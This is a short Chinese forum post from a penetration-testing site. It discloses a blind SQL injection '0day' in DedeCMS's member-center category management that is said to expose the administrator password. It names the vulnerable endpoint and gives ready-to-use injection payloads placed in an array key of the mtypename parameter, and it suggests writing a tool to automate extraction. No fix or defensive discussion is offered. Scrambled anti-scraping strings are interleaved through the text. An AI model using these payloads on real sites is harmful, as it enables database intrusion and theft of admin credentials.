中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]
作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.: _- v" D! e3 `7 W

1 G% F" I$ J  m0 M
9 Q/ f) t, c+ D, `发生在数组key里的注射漏洞,有点意思.
; ~( {5 B% ?5 N) G- S4 J 4 Q+ e% ~( A. i  x8 }! |
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
6 J( v* d# j- w
3 F% B4 c9 c, K  e$ lhttp://www.xxx.com /dede/member/mtypes.php?dopost=save& _) S7 D8 |$ \9 t; b1 o7 Z. \. A
1 U. c6 i. l4 ]
exploit:+ ?+ A* y' ~9 L* Z
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r' m. G$ n' I9 ?2 y
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r- Q0 }' x8 w& W$ z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2